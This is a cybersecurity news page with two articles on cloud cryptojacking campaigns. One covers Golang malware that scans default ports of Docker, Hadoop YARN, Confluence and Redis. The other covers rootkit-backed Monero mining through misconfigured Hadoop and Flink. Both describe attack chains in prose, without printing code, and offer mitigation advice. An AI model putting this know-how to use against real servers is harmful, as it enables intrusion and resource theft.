CybserSecurity News

Tag: TeamTNT

  • Confluence, Docker, More: Malware Targets Your Servers

    Recently, cybersecurity experts worldwide have observed an uptick in hacker attacks targeting improperly configured cloud servers running on Apache Hadoop, Docker, Confluence, and Redis.

    In one of these recent attacks, malefactors deployed a novel malicious program based on Golang to automate the search for vulnerable hosts and their subsequent compromise.

    Cado Security, a firm specializing in cloud forensics and incident response, uncovered a malicious operation that utilized specialized utilities to exploit vulnerabilities and execute arbitrary code.

    The toolkit used by hackers reminded researchers of previous operations, bearing similarities to cloud malware campaigns by TeamTNT, WatchDog, and Kiss-a-Dog.

    Wireshark output demonstrating Docker communication, including Initial Access commands

    Targets are selected through scanning open ports 2375, 8088, 8090, or 6379, which are default ports for the aforementioned software.

    Cado Security detected this attack after receiving an alert about an attempt to access the Docker Engine API Honeypot system, during which a new container based on Alpine Linux was created on the server.

    For further actions, the attackers employed several Shell scripts and quite generic Linux attack techniques to install cryptocurrency mining software, ensure persistence, and configure Reverse Shell.

    In the examined attack, hackers deployed a set of four Golang payloads responsible for identifying and utilizing hosts running services for Hadoop YARN (h.sh), Docker (d.sh), Confluence (w.sh), and Redis (c.sh).

    The names of the payloads likely represent an unsuccessful attempt to disguise them as bash scripts. In reality, they are 64-bit Golang ELF binaries.

    “All of these payloads are 64-bit Golang ELF binaries. Interestingly, the malware developer neglected to strip the binaries, leaving DWARF debug information intact. There has been no effort made to obfuscate strings or other sensitive data within the binaries either, making them trivial to reverse engineer. ,” noted the experts at Cado Security.

    The attack also employed other payloads aimed at erasing traces of initial access and complicating investigation efforts.

    Despite most payloads in the campaign being actively detected by antivirus engines on the VirusTotal platform, the four aforementioned Golang binary files are almost unidentifiable by them.

    As can be gleaned from this malicious operation, cloud services and systems with improper configurations are increasingly becoming easy targets for cybercriminals using malicious software to automate attacks.

    Companies must pay close attention to the security of their cloud resources, regularly check configurations for vulnerabilities, and promptly install security updates to protect their infrastructure from such cyber threats.

  • Apache Hadoop & Flink Hacked: Rootkits Lurk Beneath “Invisible” Malware

    Cybersecurity researchers have identified a new type of attack that exploits weaknesses in the configuration of Apache’s Hadoop and Flink software, deploying cryptocurrency miners on target systems.

    “This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal the malware,” note researchers from Aqua Security in their report published on January 8th. The malware erases the contents of specific directories and alters system configurations to evade detection.

    The attack flow

    The infection chain for Apache Hadoop exploits a misconfiguration in the YARN (Yet Another Resource Negotiator) resource manager, responsible for tracking resources in the cluster and scheduling applications.

    Specifically, this flaw allows a remote, unauthenticated attacker to execute arbitrary code through a specially crafted HTTP request, depending on the user privileges on the node where the code is executed.

    Similar attacks on Apache Flink also target a misconfiguration that allows remote attackers to execute code without any authentication.

    These vulnerabilities are not new and have previously been exploited by financially motivated groups such as TeamTNT, known for their attacks on Docker and Kubernetes for cryptojacking and other malicious activities.

    Nevertheless, the latest attacks are notable for their use of rootkits to conceal cryptocurrency mining processes following the initial penetration of Hadoop and Flink applications.

    Initially, the attacker sends an unauthenticated request to deploy a new application, followed by a POST request to YARN, asking to launch this new application with a specific command.

    This command is designed to clear the /tmp directory of all existing files, download a file named “dca” from a remote server, execute it, and then repeat the deletion of all files in the /tmp directory.

    The executed code is a packed ELF binary, which downloads two rootkits and a Monero miner binary file. To achieve persistence, a cron job is created to download and execute a shell script that deploys the “dca” binary file.

    Analysis of the perpetrator’s infrastructure reveals that the server for downloading the payload was registered on October 31, 2023.

    As a risk mitigation measure, organizations are advised to deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binary files, and other suspicious activities.